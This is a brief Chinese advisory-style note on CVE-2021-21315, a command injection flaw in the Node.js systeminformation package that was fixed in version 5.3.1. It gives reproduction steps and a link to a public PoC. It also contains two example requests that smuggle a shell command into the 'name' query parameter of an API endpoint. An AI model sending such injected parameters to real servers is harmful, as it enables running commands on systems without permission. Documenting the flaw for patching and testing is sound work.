Node.js命令注入漏洞（CVE-2021-21315）.md

1.04 KB / 2021-05-21 09:14:38
    # Node.js命令注入漏洞（CVE-2021-21315）


Node.js-systeminformation是用于获取各种系统信息的Node.JS模块，它包含多种轻量级功能，可以检索详细的硬件和系统相关信息。自发布至今，systeminformation软件包下载次数近3400万。2021年02月24日，npm团队发布安全公告，Node.js库中的systeminformation软件包中存在一个命令注入漏洞（CVE-2021-21315），其CVSSv3评分为7.8。攻击者可以通过在未经过滤的参数中注入Payload来执行系统命令。目前该漏洞已经在5.3.1版本中修复。

**复现步骤：**

* 1.Linux服务器环境上运行应用程序
* 2.向site.com/api/getServices?name=nginx 发送GET请求
* 3.发送

PoC：https://github.com/ForbiddenProgrammer/CVE-2021-21315-PoC

```
yoursite.com/api/getServices?name=$(echo -e 'Sekurak' > pwn.txt)
yoursite.com/api/getServices?name[]=$(echo -e 'Sekurak' > pwn.txt)
```

**ref：**

* https://www.venustech.com.cn/new_type/aqtg/20210225/22407.html
* https://github.com/ForbiddenProgrammer/CVE-2021-21315-PoC